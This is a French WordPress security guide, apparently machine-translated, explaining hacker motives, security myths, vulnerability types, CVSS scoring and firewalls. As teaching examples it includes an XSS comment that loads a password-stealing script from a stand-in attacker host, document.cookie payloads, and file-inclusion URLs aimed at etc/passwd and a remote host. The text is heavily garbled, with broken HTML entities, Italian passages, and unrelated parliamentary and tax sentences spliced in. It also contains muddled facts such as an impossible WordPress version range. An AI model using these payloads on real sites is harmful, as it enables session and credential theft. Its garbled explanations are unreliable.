La sécurité de WordPress peut être intimidante, mais pas nécessairement. Dans ce guide complet de sécurité WordPress, nous avons simplifié les bases de la protection des sites WordPress afin que tout non technicien puisse comprendre et protéger ses sites contre les pirates informatiques. Ce guide de sécurité WordPress est divisé en 10 sections faciles à comprendre. Chaque section guidera sur des aspects spécifiques de la sécurité WordPress. À la fin de ce guide, découvrirez les différents types de vulnérabilités, les raisons du piratage et tout sur la façon de protéger les utilisateurs individuels, du serveur au site WordPress.
Plongeons! Section 1 de ce guide: WordPress est il sûr? WordPress est il sûr? En bref, la réponse est oui. WordPress représente près de 40% de tous les sites Internet. L’une des principales raisons de la popularité de WordPress est qu’il s’agit d’une plateforme très sécurisée pour créer tout, des blogs aux grands magasins de commerce électronique. Y a t il des problèmes de sécurité avec wordpress? Bien que WordPress lui même soit sûr, éviter les erreurs de sécurité de WordPress nécessite un peu d’effort de la part du propriétaire du site. En fait, le plus gros problème de sécurité de WordPress est ses utilisateurs. Le propriétaire du site peut éviter la plupart des attaques de piratage WordPress sur la plateforme avec un peu d’effort.
Ne tamp;rsquoinquiète pas, on va te protéger. Ce guide apprendra tout ce dont avez besoin pour protéger votre site Web. Il y a cinq choses que nous devons savoir avant de protéger notre site. Pourquoi les pirates informatiques attaquent ils différents types de sites WordPress pirates informatiques types spécifiques de vulnérabilités WordPress comment empêcher les vulnérabilités WordPress comment déterminer la gravité de la vulnérabilité pourquoi les pirates informatiques devraient ils attaquer mon site Web? C’est un problème de sécurité WordPress commun que pouvez résoudre dans le pire des cas
Je voudrais remercier le Rapporteur pour son excellent rapport. Cela ne signifie toutefois pas que tout le monde le fasse légalement et moralement. Même les plus petits sites Web, les hackers font des profits élevés. Lamp;rsquoargent est tout ce dont ils ont besoin, mais certaines personnes apprécient le sentiment de pouvoir quamp;rsquoelles ont acquis lorsquamp;rsquoelles ont violé avec succès un site Web, mais la grande majorité des gens font des affaires uniquement pour de lamp;rsquoargent. Section 2: Découvrez quelques mythes de sécurité WordPress avant de continuer à lire le reste de ce guide de sécurité WordPress.
Vous trouverez beaucoup de conseils de sécurité WordPress qui circulent sur Internet, de la part de personnes bien intentionnées qui veulent vraiment aider. Malheureusement, certaines de ces astuces sont basées sur le mythe de sécurité de WordPress et n’ajoutent pratiquement aucune sécurité supplémentaire au site WordPress. En effet, certains
La fréquence est mentionnée comme un mythe. Nombre de maux de tête causés par les mythes. Le mythe donne un faux sentiment de sécurité. Vous devriez cacher votre administrateur URL WP ou votre login WP (également connu sous le nom de cache Backend). Lamp;rsquoidée derrière cacher un administrateur Wp est que les pirates informatiques ne peuvent pas déchiffrer ce quamp;rsquoils ne peuvent pas trouver. votre URL de connexion n’est pas une URL WordPress standard WP admin , n’êtes pas vulnérable à la violence? En fait, la plupart des caractéristiques de lamp;rsquoarrière plan caché sont
Et le thème parfait et le numéro de version WordPress. Cependant, il y a des robots sans cerveau qui cherchent sur Internet des vulnérabilités connues dans le Code réel qui fonctionne sur votre site, de sorte que cacher le nom du sujet et le numéro de version WP ne protégera pas. 3. Vous devriez renommer votre répertoire de contenu WP le Répertoire de contenu WP contient vos plug ins, sujets et dossiers de téléchargement de médias. Il y a beaucoup de bonnes choses et de code exécutable dans un répertoire, donc il est compréhensible que les gens veulent prendre lamp;rsquoinitiative de protéger ce dossier. Malheureusement, changer le nom du contenu WP ajoutera une couche de sécurité supplémentaire au site, ce qui est le mythe de sécurité de WordPress. Il ne le fera pas. Nous pouvons facilement trouver le nom du Répertoire de contenu WP modifié en utilisant les outils de développement de navigateur. Dans la capture damp;rsquoécran ci dessous, nous pouvons voir que jamp;rsquoai renommé le Répertoire de contenu de ce site Web en test . Le changement de nom de répertoire namp;rsquoajoute aucune sécurité au site, mais il peut causer des conflits de chemin de répertoire contenu WP plug in codé dur. Mon site n’est pas assez grand pour attirer l’attention des hackers sur ce mythe de sécurité WordPress qui rend de nombreux sites vulnérables aux attaques. Même si possédez un petit site avec peu de trafic, il est essentiel de protéger activement votre site. Même si possédez un petit site avec peu de trafic, il est essentiel de protéger activement votre site. Le fait est que votre site Web ou votre entreprise namp;rsquoa pas besoin damp;rsquoêtre grand pour attirer lamp;rsquoattention damp;rsquoun attaquant potentiel. Les pirates informatiques ont encore la possibilité damp;rsquoutiliser votre site Web comme un moyen de rediriger Certains visiteurs vers des sites malveillants, damp;rsquoenvoyer du spam à partir de serveurs de courrier, de propager des virus et même damp;rsquoextraire B
Votre site Web sera lamp;rsquoun des millions de sites Web les plus visités chaque mois. De nombreux hackers attaquent votre site dans lamp;rsquointention de lamp;rsquoinfecter avec des logiciels malveillants. Les logiciels malveillants sont de petits morceaux de code qui peuvent être utilisés pour apporter des changements malveillants à un site Web. votre site Web est infecté par des logiciels malveillants, il est important damp;rsquoêtre informé dès que possible. Chaque minute quamp;rsquoun logiciel malveillant reste sur votre site, il peut causer plus de dommages à votre site. Plus le site est endommagé, plus il faut de temps pour le nettoyer et le restaurer. Il est essentiel de vérifier la santé du site Web en scannant régulièrement les logiciels malveillants. Camp;rsquoest pourquoi il est essentiel de continuer à vérifier lamp;rsquoétat de santé du site Web en scannant les logiciels malveillants. Un hacker de ransomware pourrait vouloir attaquer votre site Web pour obtenir ransomware. Le ransomware signifie que lorsque le hacker contrôle votre site, il ne sera pas publié à moins que ne payiez des frais élevés. Le temps damp;rsquoarrêt moyen pour les attaques de ransomware est de 9,5 jours. Combien cela coûtera t il de ne pas vendre pendant 10 jours? La rançon moyenne demandée par les pirates informatiques a fortement augmenté, passant de 294 $en 2015 à plus de 13 000 $en 2020. Grâce à ce mode de paiement, la criminalité en ligne namp;rsquoa pas ralenti. Au fur et à mesure que ces communautés criminelles se développent, il devient de plus en plus important de protéger et de protéger adéquatement votre site Web. 4. te corrompu certains hackers peuvent attaquer votre site pour le plaisir. Un piratage qui namp;rsquoest pas si diabolique par nature est un site de diffamation. Ce sont généralement des enfants ou des jeunes qui commencent tout juste à jouer au piratage. Ils lamp;rsquoont fait pour
Un hacker peut être utilisé pour effectuer des entrées malveillantes. Gardez à lamp;rsquoesprit que les hackers Web sont presque toujours automatisés. Pour cette raison, les hackers peuvent facilement accéder à un grand nombre de sites Web, presque en un clin damp;rsquooeil. Les hackers utilisent des outils spéciaux pour scanner les vulnérabilités connues sur Internet. Les hackers aiment les cibles faciles à attaquer, et avoir un site Web avec un logiciel qui exécute des vulnérabilités connues est comme donner aux hackers des instructions étape par étape pour accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Notre rapport mensuel de collecte des vulnérabilités WordPress couvre toutes les vulnérabilités dans WordPress Core, les plug ins WordPress et les sujets de divulgation publique. Dans ces collections, nous partageons le nom du plug in ou du sujet de vulnérabilité, la version touchée et le type de vulnérabilité. Quamp;rsquoest ce quamp;rsquoune vulnérabilité de jour zéro? Une vulnérabilité de jour zéro est une vulnérabilité qui est divulguée publiquement avant quamp;rsquoun développeur ne publie un correctif de vulnérabilité. En parlant de sécurité WordPress, il est important de comprendre la définition de la vulnérabilité de jour zéro. Comme la vulnérabilité a été divulguée au public, les développeurs namp;rsquoont pas eu le temps de la corriger. Cela a une grande influence sur votre plug in et votre thème. Souvent, les chercheurs en sécurité découvrent les vulnérabilités et les divulguent en privé aux développeurs de lamp;rsquoentreprise qui possèdent le logiciel. Les chercheurs et les développeurs en sécurité conviennent que des détails complets seront publiés dès que le correctif sera disponible. Après la publication du correctif, la divulgation de la vulnérabilité peut être légèrement retardée afin de donner à un plus grand nombre de personnes le temps de mettre à jour les principales vulnérabilités en matière de sécurité. Cependant, si le développeur ne répond pas au chercheur
En ce qui concerne la sécurité ou lamp;rsquoabsence de correctifs de vulnérabilité, les chercheurs peuvent divulguer publiquement des vulnérabilités afin de faire pression sur les développeurs pour quamp;rsquoils publient des correctifs. La divulgation publique des vulnérabilités et lamp;rsquointroduction apparente damp;rsquoune journée zéro pourraient être contre productives. Mais camp;rsquoest le seul moyen pour les chercheurs de faire pression sur les développeurs pour quamp;rsquoils corrigent les bogues. Le projet zéro de Google a des lignes directrices similaires pour lamp;rsquoexposition aux vulnérabilités. Ils ont publié tous les détails de la fuite 90 jours plus tard. la vulnérabilité a été corrigée. Namp;rsquoimporte qui peut le découvrir. un hacker découvre une vulnérabilité avant que le développeur ne publie le correctif, ce sera le pire cauchemar de lamp;rsquoutilisateur final Zéro jour utilisé activement. Quamp;rsquoest ce quamp;rsquoune vulnérabilité de jour zéro activement exploitée? Une vulnérabilité de jour zéro activement exploitée est ce à quoi elle ressemble. Il samp;rsquoagit damp;rsquoune vulnérabilité non corrigée que les pirates informatiques peuvent cibler, exploiter et exploiter activement. À la fin de 2018, les pirates informatiques exploitent activement de graves vulnérabilités WordPress dans le plug in de conformité WP gdpr. Cette vulnérabilité permet aux utilisateurs non autorisés de modifier les paramètres damp;rsquoinscription des utilisateurs du WP et de changer le nouveau rôle damp;rsquoutilisateur par défaut de lamp;rsquoabonné à lamp;rsquoAdministrateur, comme décrit dans la section suivante. Ces hackers ont découvert cette vulnérabilité avant le plug in de conformité WP gdpr et les chercheurs en sécurité. Par conséquent, tout site Web qui a installé le plugin est une marque de commerce simple et garantie pour les cybercriminels. La meilleure façon de se protéger contre une vulnérabilité de jour zéro la meilleure façon de protéger un site Web contre une vulnérabilité de jour zéro est de désactiver et de supprimer le logiciel jusquamp;rsquoà ce que la vulnérabilité soit corrigée. Heureusement, les développeurs du plug in de conformité WP gdpr ont
Le lendemain de sa divulgation, il a rapidement publié un correctif pour cette vulnérabilité. Une vulnérabilité sans correctif rend votre site facile à cibler par des pirates informatiques. Vulnérabilité WordPress non validée et validée lorsque parlez de vulnérabilité WordPress, devez également comprendre deux autres termes. Non authentifié: une vulnérabilité WordPress non authentifiée signifie que n’importe qui peut l’exploiter. Vérifié: une vulnérabilité WordPress validée signifie qu’un utilisateur connecté est nécessaire pour exploiter cette vulnérabilité. Il est difficile pour un hacker damp;rsquoexploiter une vulnérabilité qui nécessite un utilisateur authentifié, en particulier une vulnérabilité qui nécessite des privilèges damp;rsquoadministrateur. De plus, si un hacker possède déjà un ensemble damp;rsquoidentifiants damp;rsquoadministrateur, il namp;rsquoa pas vraiment besoin damp;rsquoexploiter la vulnérabilité pour créer de la confusion. Il y a un avertissement. Certaines vulnérabilités authentifiées namp;rsquoont besoin que damp;rsquoexploiter la fonctionnalité au niveau de lamp;rsquoabonné. votre site permet à quelquamp;rsquoun de samp;rsquoinscrire, il namp;rsquoy a pas beaucoup de différence entre cette vulnérabilité et une vulnérabilité non vérifiée. En parlant de vulnérabilité WordPress, il y a 21 types communs de vulnérabilité. Nous avons introduit chaque type de vulnérabilité WordPress. La vulnérabilité de contournement damp;rsquoauthentification permet à un attaquant de contourner les exigences damp;rsquoauthentification et damp;rsquoexécuter des tâches qui sont généralement réservées aux utilisateurs authentifiés. Lamp;rsquoauthentification est le processus damp;rsquoauthentification de lamp;rsquoutilisateur. WordPress exige des utilisateurs qu’ils saisissent un nom d’utilisateur et un mot de passe pour s’authentifier. Contournement de lamp;rsquoauthentification lamp;rsquoexemple damp;rsquoapplication valide lamp;rsquoauthentification en fonction damp;rsquoun ensemble fixe de paramètres. Un attaquant peut modifier ces paramètres pour accéder à ce qui est normalement nécessaire
Les scripts croisés réfléchissants se produisent lorsquamp;rsquoun script malveillant est envoyé au serveur dans une demande du client (une demande de lamp;rsquoutilisateur dans le navigateur), réfléchi par le serveur et exécuté par le navigateur. Supposons que votre favesite soit un exemple de réflexion de script inter site. Com demande lamp;rsquoaccès à certains contenus du site. Supposons que ce site namp;rsquoencode pas correctement lamp;rsquoentrée de lamp;rsquoutilisateur. Un attaquant peut exploiter cette vulnérabilité en créant un lien malveillant et en le partageant avec un utilisateur de votre site. Courriels et messages sur les médias sociaux. Je suis ton préféré. Lamp;rsquooutil com Cool attaqué utilise lamp;rsquooutil de raccourcissement damp;rsquoURL pour rendre les liens malveillants non menaçants et très cliquables, yourfavesite. Com cool things. Cependant, lorsque cliquez sur le lien raccourci, le lien complet samp;rsquoexécute à partir de votre navigateur de site. Com cool things? Q = quelque chose de cool Liens Une vulnérabilité de script xss stockée ou inter site stockée permet à un hacker damp;rsquoinjecter du Code malveillant et de le stocker sur un serveur damp;rsquoapplication Web. Exemple de script inter site archivé un attaquant a trouvé votre site. Com permet aux visiteurs damp;rsquointégrer des balises HTML dans la section commentaires du site. Puis lamp;rsquoattaquant a créé un nouveau commentaire: excellent article! Voir un autre grand article . amp;ltscriptamp;ampsrc=”http:bad-guys.compasswordstealingcode.js . Dopo aver fatto clic sul collegamento, verrai indirizzato a yourfavesite.com e lo script dannoso verrà riflesso nel tuo browser, consentendo yourfavesite.com di dirottare i cookie di sessione e yourfavesite.com account yourfavesite.com . Come prevenire lo scripting cross-site riflesso La regola n. 5 sul cheat sheet di prevenzione cross-scripting di OWASP è la codifica dellamp;039URL prima di inserire dati non attendibili nei valori dei parametri URL HTML. Questa regola può aiutare a prevenire la creazione di una vulnerabilità XSS riflessa quando si aggiungono dati non attendibili nel valore del parametro HTTP GET. Remarque: la vulnérabilité xss reflétée invite les visiteurs à cliquer sur le lien de code malveillant pour lamp;rsquoexécuter. Les attaques xss stockées namp;rsquoont besoin que damp;rsquoaccéder aux pages qui contiennent des commentaires. Le Code malveillant est exécuté chaque fois que la page est chargée. Maintenant que notre voyou a ajouté ce commentaire, tous les futurs visiteurs de cette page seront exposés à ses scripts malveillants. Le script est hébergé sur le site Web de lamp;rsquoattaquant et peut détourner C
Basé sur Dom en envoyant lamp;rsquoURL suivante au nouvel utilisateur: http:yourfavesite.comaccount?name= Alertes (document.cookie) Lorsque le nouvel utilisateur clique sur le lien, le navigateur envoie une demande: Account? Nom = Alertes (document.cookie) Un méchant. Com. Le site répondra en utilisant la page contenant le code JavaScript ci dessus. Le navigateur du nouvel utilisateur crée un objet Dom pour la page qui contient des objets de document. Lamp;emplacement contient une chaîne: http:www.bad-guys.comaccount?name= Alertes (document.cookie)
Le code original sur la page ne veut pas que les paramètres par défaut contiennent des balises HTML, mais plutôt des balises sur la page de réponse. Le navigateur du nouvel utilisateur rendra ensuite la page et exécutera le script de lamp;rsquoattaquant: Alert (document.cookie) How to Prevent Dom Based Cross site scripting Preventing Cheat Sheet Rule 1 est HTML Escape. JS samp;rsquoéchappe ensuite avant damp;rsquoajouter des données non fiables au sous contexte HTML dans le contexte damp;rsquoexécution. Exemple de méthode HTML dangereuse: attributs damp;rsquoélément. InnerHTML =
Période Exemples d’escalade des privilèges dans notre résumé de vulnérabilité WordPress de novembre 2020, nous signalons une vulnérabilité d’escalade des privilèges trouvée dans le plug in membre final (qui a été corrigé dans la version 2.1.12). Un attaquant peut fournir des paramètres de tableau pour les éléments utilisateurs de la capacité wp u qui définissent le rôle de lamp;rsquoutilisateur. Au cours du processus damp;rsquoinscription, les détails damp;rsquoinscription soumis sont transmis à la fonction Update _ profile et toutes les métadonnées soumises, peu importe ce qui est envoyé, sont mises à jour pour les utilisateurs nouvellement enregistrés. Cette vulnérabilité permet essentiellement aux nouveaux utilisateurs de demander à un administrateur pendant leur inscription. Comment empêcher la mise à jour des permissions ithemes Security pro peut aider à protéger votre site contre les contrôles damp;rsquoaccès corrompus en limitant lamp;rsquoaccès des administrateurs à la liste des périphériques de confiance. Vulnérabilité damp;rsquoexécution de code à distance RCE ou vulnérabilité damp;rsquoexécution de code à distance permet à un attaquant damp;rsquoaccéder et de modifier, voire de contrôler un ordinateur ou un serveur. Exemple damp;rsquoexécution de code à distance en 2018, Microsoft a découvert une vulnérabilité damp;rsquoexécution de code à distance dans Excel. En exploitant avec succès cette vulnérabilité, un attaquant peut exécuter du Code arbitraire dans le contexte de lamp;rsquoutilisateur actuel. lamp;rsquoutilisateur actuel est connecté avec des privilèges damp;rsquoutilisateur administratifs, un attaquant peut prendre le contrôle du système affecté. Lamp;rsquoattaquant peut alors installer le programme Afficher, modifier ou supprimer des données Ou créer un nouveau compte avec des privilèges damp;rsquoutilisateur complets. Les utilisateurs dont les comptes sont configurés pour avoir moins de privilèges damp;rsquoutilisateur sur le système peuvent être moins touchés que les utilisateurs suivants:
La Commission a également adopté une proposition de directive qui est à peu près identique à la législation des États Membres en matière de taxes sur le chiffre damp;rsquoaffaires. La façon la plus simple damp;rsquoéviter lamp;rsquoexécution de code à distance pour atténuer la vulnérabilité RCE est de valider lamp;rsquoentrée de lamp;rsquoutilisateur en filtrant et en supprimant les caractères indésirables. Notre société mère, Liquid Web, a un article sur la prévention de lamp;rsquoexécution de code à distance. Vulnérabilité à lamp;rsquoinclusion de fichiers une vulnérabilité à lamp;rsquoinclusion de fichiers se produit lorsquamp;rsquoune application Web permet à un utilisateur damp;rsquoenvoyer des entrées à un fichier ou de un fichier sur un serveur. Il existe deux types de fichiers qui contiennent des vulnérabilités, locales et distantes. Vulnérabilité damp;rsquoinclusion de fichiers locaux LFI ou vulnérabilité damp;rsquoinclusion de fichiers locaux permet à un attaquant de lire et parfois damp;rsquoexécuter des fichiers sur un serveur de site Web. Un exemple damp;rsquoinclusion damp;rsquoun fichier local nous amène à votre site Web. Com, où le chemin passé à lamp;rsquoinstruction contenant namp;rsquoest pas nettoyé correctement. Par exemple, regardons lamp;rsquoURL ci dessous. Yourfavesite. Com module. Php? Fichier = exemple. Un attaquant de fichier peut modifier les paramètres damp;rsquoURL pour accéder à des fichiers arbitraires sur le serveur. Yourfavesite. Com module. Php? File = etc passwd changer la valeur du fichier dans lamp;rsquoURL pourrait permettre à un attaquant de voir le contenu du fichier psswd. Comment empêcher lamp;rsquoinclusion damp;rsquoune liste de fichiers autorisés que la page de création de fichiers locaux peut contenir, puis utiliser un identificateur pour accéder au fichier sélectionné. Toute demande contenant un identificateur invalide est ensuite bloquée. Vulnérabilité damp;rsquoinclusion de fichiers distants RFI ou vulnérabilité damp;rsquoinclusion de fichiers distants permet à un attaquant damp;rsquoinclure des fichiers, généralement en exploitant le mécanisme damp;rsquoinclusion de fichiers dynamiques mis en œuvre dans lamp;rsquoapplication cible. Fichiers distants avec spritz désactivés dans le dépôt contenant des exemples de plug ins WP WordPress
Tolly Word Press. Org, parce quamp;rsquoil a une vulnérabilité RFI. Voici le code source de la vulnérabilité: if (isset ($u Get [amp;lsquoURL]) {$content = File _ get Contents ($u Get [amp;lsquo URL]) pouvez lamp;rsquoexploiter en modifiant la valeur de content.filter.php? Url = value. Exemple: yoursite.com WP content plugins WP with spritz wp.spritz.content.filter.php? Url = http Http: Bad gues. Empêche com exec qui contient des fichiers distants de créer une liste de fichiers autorisés que la page peut contenir, puis damp;rsquoaccéder au fichier sélectionné en utilisant un identificateur. Toute demande contenant un identificateur invalide est ensuite bloquée. Une vulnérabilité de traversée de répertoire ou de fichier permet à un attaquant de lire des fichiers arbitraires sur le serveur exécutant lamp;rsquoapplication. Échantillons croisés de répertoires les versions 5.7 à 5.03 de WordPress sont vulnérables aux attaques croisées de répertoires parce qu’elles ne valident pas correctement les données d’entrée de l’utilisateur. Un attaquant accédant à un compte avec au moins les privilèges damp;rsquoauteur peut exploiter une vulnérabilité de traversée de répertoire et exécuter du Code PHP malveillant sur le serveur sous jacent pour une capture à distance complète. Comment empêcher les développeurs croisés de répertoires damp;rsquoutiliser des index au lieu de la partie réelle du nom de fichier lors de la création de modèles ou damp;rsquoutiliser des fichiers de langue. Vulnérabilité de redirection malveillante une vulnérabilité de redirection malveillante permet à un attaquant damp;rsquoinjecter du Code pour rediriger un visiteur de site Web vers un autre site Web. Lamp;rsquoexemple de redirection malveillante suppose que êtes à la recherche damp;rsquoun pull bleu dans une boutique en ligne à lamp;rsquoaide damp;rsquoun outil de recherche. Malheureusement, le serveur boutique ne peut pas encoder correctement lamp;rsquoentrée de lamp;rsquoutilisateur et
Octets sec. Il existe deux façons principales de prévenir les attaques par déni de service et damp;rsquoatténuer les attaques dos. Achetez plus damp;rsquohôtes que namp;rsquoen avez besoin. Avoir des ressources supplémentaires peut aider à surmonter la croissance de la demande causée par les attaques dos. Utilisez un pare feu au niveau du serveur, comme cloudflare. Un pare feu peut détecter des pointes anormales de trafic et empêcher la surcharge du site. Enregistrement des touches lamp;rsquoenregistrement des touches est également appelé enregistrement du clavier ou acquisition du clavier. Lamp;rsquoenregistrement des touches se produit lorsque le hacker surveille et enregistre secrètement les touches pressées par les visiteurs du site. Exemple damp;rsquoenregistrement de keysequence en 2017, un hacker a installé avec succès un JavaScript malveillant sur le serveur du fabricant de smartphones oneplus. Un attaquant utilise du Code malveillant pour surveiller et enregistrer les clés du client oneplus lorsquamp;rsquoil entre les détails de la carte de crédit. Avant quamp;rsquooneplus ne détecte et répare les attaques de pirates informatiques, les pirates informatiques ont enregistré et recueilli des informations clés sur 40 000 clients. Comment empêcher la mise à jour complète de lamp;rsquoenregistrement de la chaîne de clés! En général, un attaquant doit utiliser une autre vulnérabilité existante pour insérer un enregistreur de clavier dans un ordinateur ou un serveur. La mise à jour de tout le contenu avec les derniers correctifs de sécurité évitera de donner aux pirates un moyen facile damp;rsquoinstaller un Keylogger sur votre site Web ou votre ordinateur. Avantage: la vulnérabilité du logiciel damp;rsquoHameçonnage est la seule vulnérabilité que les pirates informatiques et les cybercriminels tentent damp;rsquoexploiter. Les hackers ciblent également les humains et les utilisent pour attaquer. Une utilisation courante est lamp;rsquohameçonnage. Quamp;rsquoest ce que lamp;rsquohameçonnage? Lamp;rsquohameçonnage est une méthode damp;rsquoattaque en ligne qui utilise le courriel, les médias sociaux, les messages texte et le téléphone pour tromper les victimes en leur fournissant des renseignements personnels. Lamp;rsquoattaquant utilisera ensuite ces informations pour accéder à un compte personnel ou
Fraude à lamp;rsquoidentité. Comment détecter les courriels damp;rsquohameçonnage comme nous lamp;rsquoavons vu précédemment dans certaines vulnérabilités nécessitent un certain type damp;rsquointeraction utilisateur pour être exploitées. Une façon pour les hackers damp;rsquoattirer les gens dans leurs activités maléfiques est damp;rsquoenvoyer des e mails damp;rsquohameçonnage. Apprenez à identifier les courriels damp;rsquohameçonnage pour éviter de participer involontairement à des programmes de cybercriminels. 4 conseils pour détecter les courriels damp;rsquohameçonnage: voir lamp;rsquoadresse électronique de lamp;rsquoexpéditeur: recevez un courriel damp;rsquoune entreprise, la partie de lamp;rsquoadresse électronique de lamp;rsquoexpéditeur qui suit « @ » doit correspondre au nom de lamp;rsquoentreprise. un courriel représente une entreprise ou une entité gouvernementale, mais utilise une adresse électronique publique comme « @ gmail », il samp;rsquoagit damp;rsquoun courriel damp;rsquohameçonnage. Notez les petites erreurs damp;rsquoorthographe dans le nom de domaine. Par exemple, regardons cette adresse e mail [protégée par e mail] et nous pouvons voir que Netflix a un
Déterminer lamp;rsquoutilisateur en fonction de la nécessité damp;rsquoexploiter lamp;rsquointeraction utilisateur pour la vulnérabilité. lamp;rsquointeraction utilisateur namp;rsquoest pas nécessaire pour permettre à un attaquant damp;rsquoexploiter la vulnérabilité, elle est plus élevée.
Description des exigences en matière damp;rsquointeraction utilisateur No (n) Les systèmes vulnérables peuvent être exploités sans aucune interaction utilisateur. Demande Pour exploiter correctement cette vulnérabilité, lamp;rsquoutilisateur doit prendre certaines mesures avant de lamp;rsquoexploiter, par exemple en le persuadant de cliquer sur un lien dans un courriel. 1.1.5. Les scores de portée sont basés sur les vulnérabilités des composants logiciels qui ont une incidence sur les ressources en dehors de leur portée de sécurité. La portée de la sécurité comprend damp;rsquoautres composants qui ne fournissent que des fonctions à ce composant, même samp;rsquoils ont leurs propres permissions de sécurité. Les scores sont plus élevés lorsque la plage change. Description de lamp;rsquoutilisation Pas de changement Les vulnérabilités exploitées ne peuvent affecter que les ressources gérées par la même institution. Dans ce cas, les parties vulnérables et touchées coïncident. amp;lt!DOCTYPE foo [ Modifié
| Incidence sur la description de la confidentialité | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Perte totale de confidentialité, entraînant Divulguer toutes les ressources du logiciel attaqué à lamp;rsquoattaquant. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Une certaine perte de confidentialité. Un attaquant peut accéder à des informations confidentielles. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| La confidentialité namp;rsquoest pas perdue dans le logiciel utilisé. | 1.2.2. Intégrité (Io) ce score damp;rsquointégrité est basé sur lamp;rsquoimpact damp;rsquoune exploitation réussie sur lamp;rsquointégrité. Plus les conséquences du logiciel touché sont importantes, plus le score est élevé. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Perte totale damp;rsquointégrité ou perte totale de protection. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| La modification des données namp;rsquoaura pas damp;rsquoimpact direct important sur le logiciel touché. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Impact sur la description de la disponibilité | |||||||||||||||||||||||||||||||||||||||||||||||||||
| Une perte totale de disponibilité entraîne un déni total damp;rsquoaccès aux ressources du logiciel attaqué. | |||||||||||||||||||||||||||||||||||||||||||||||||||
| Réduction du rendement ou interruption de la disponibilité des ressources. | |||||||||||||||||||||||||||||||||||||||||||||||||||
| Valeur damp;rsquoexpiration décrite par Code | |||||||||||||||||||||||||||||||||||||||||||
| Lamp;rsquoattribution de cette valeur à une mesure namp;rsquoaffecte pas les scores. Camp;rsquoest un signal que la formule de notation saute cet indicateur. | |||||||||||||||||||||||||||||||||||||||||||
| Non défini (CR: x) | La perte (confidentialité intégrité disponibilité) peut avoir un impact limité sur lamp;rsquoOrganisation. | ||||||||||||||||||||||||||||||||||
| Faible (CR: l) | Le risque de perte (confidentialité intégrité disponibilité) a de graves répercussions sur lamp;rsquoOrganisation. | ||||||||||||||||||||||||||||||||||
| Élevé (CR: h) | |||||||||||||||||||||||
| Calcul des scores cvss environnementaux les scores environnementaux sont définis comme si (score damp;rsquoimpact modifié) | |||||||||||||||||||||||
| 0 | Il namp;rsquoy en a pas. | ||||||||||||||||||||||
| 4,0 – 6,9 | |||||||||||
| 7,0 – 8,9 | |||||||||||
| 9,0 – 10,0 | |||||||||||
| 3 méthodes de mise en oeuvre du WAF il existe trois méthodes différentes de mise en oeuvre du WAF. Examinons les avantages et les inconvénients de chaque type. WAF basé sur le réseau: les WAF physiques ou basés sur le réseau sont basés sur le matériel. Le principal avantage du WAF basé sur le réseau est la faible latence due à lamp;rsquoinstallation locale. Toutefois, les inconvénients découlent des prix damp;rsquoentreposage et damp;rsquoentretien du matériel. Les prix et les exigences de stockage physique font que la plupart des gens font de mauvais choix. WAF basé sur l’hôte: WAF basé sur l’hôte ou local intégré dans WordPress, généralement en utilisant des plug ins. Lamp;rsquoavantage du WAF basé sur lamp;rsquohôte est quamp;rsquoil est moins cher que le WAF basé sur le réseau. Avantage d G les correctifs de routine et de sécurité publiés par Microsoft le deuxième mardi de chaque mois. Microsoft a publié des correctifs de sécurité sur une base aussi fiable, ce qui est fantastique. Patch est également le jour où Microsoft patch divulgue publiquement des vulnérabilités en matière de sécurité mardi. Consultez le contenu à mettre à jour dans le Guide de sécurité ultime de WordPress 2020 ebook et comment mettre à jour automatiquement pour savoir comment appliquer automatiquement les mises à jour de mardi. Le mercredi suivant la sortie du correctif de mardi, de nombreux attaquants sont généralement vus exploiter une vulnérabilité précédemment connue sur un système obsolète sans correctif. Par conséquent, le mercredi du prochain patch a été officiellement nommé mercredi de la vulnérabilité. Pourquoi un hacker vise t il une vulnérabilité corrigée? Les hackers visent à corriger les vulnérabilités parce quamp;rsquoils savent que les gens ne les mettront pas à jour (y compris les plug ins et les sujets sur le site). La divulgation publique des vulnérabilités le jour de lamp;rsquoapplication du correctif est une norme de lamp;rsquoindustrie. Une fois quamp;rsquoune vulnérabilité est divulguée publiquement, elle devient une « vulnérabilité connue » dans une version obsolète et non corrigée du logiciel. Les logiciels présentant des vulnérabilités connues peuvent facilement être ciblés par des pirates informatiques. Les hackers aiment les cibles faciles à attaquer et les logiciels avec des vulnérabilités connues sont comme des instructions étape par étape pour les hackers d’accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Divulgation responsable pouvez demander pourquoi une vulnérabilité peut se produire si elle offre une occasion damp;rsquoattaque à un hacker. Eh bien, il est courant que les chercheurs en sécurité découvrent les vulnérabilités en privé et les signalent aux développeurs de logiciels. Sous réserve damp;rsquoune divulgation responsable, lamp;rsquoétude initiale sera présentée en privé à: Public Mais, comme lamp;rsquoattaque de mercredi, le hacker a verrouillé la vulnérabilité même si un correctif a été publié. Dans les jours et les semaines qui ont suivi la divulgation de la vulnérabilité de conformité de WP gdpr, nous avons reçu un grand nombre de rapports selon lesquels le site WordPress a été compromis par des attaquants qui exploitent cette vulnérabilité. Le principal coupable de la corruption du site WordPress est un plugin ou un thème vulnérable avec des correctifs disponibles mais non appliqués. Questo Kos frossrant!!!!! Cela signifie que la plupart des hackers WP peuvent être arrêtés. Il est choquant de penser à ceux qui ont dépensé beaucoup damp;rsquoargent pour nettoyer le site, aux revenus quamp;rsquoils ont perdus pendant quamp;rsquoil était inactif, et aux revenus futurs quamp;rsquoils ont perdus en perdant la confiance de leurs clients. Vous serez encore plus choqué quand saurez que toute cette douleur peut être évitée par une simple mise à jour. Les fonctionnalités de gestion de version d’ithemes Security pro permettent de personnaliser et de mettre à jour automatiquement WordPress. Le suivi des vulnérabilités WordPress garder les plug ins et les thèmes à jour ne protégera pas contre chaque vulnérabilité WordPress. Certains plugins et thèmes WordPress ont été abandonnés par les développeurs qui les ont créés. Malheureusement, si un plug in ou un thème obsolète a une vulnérabilité, il ne recevra jamais de correctif. Les pirates cibleront les sites Web qui utilisent ces plug ins qui sont maintenant vulnérables de façon permanente. Une vulnérabilité de suivi est la différence entre avoir un site Web sécurisé et un site Web facilement accessible aux pirates informatiques. avez un plug in obsolète avec une vulnérabilité connue sur votre site, 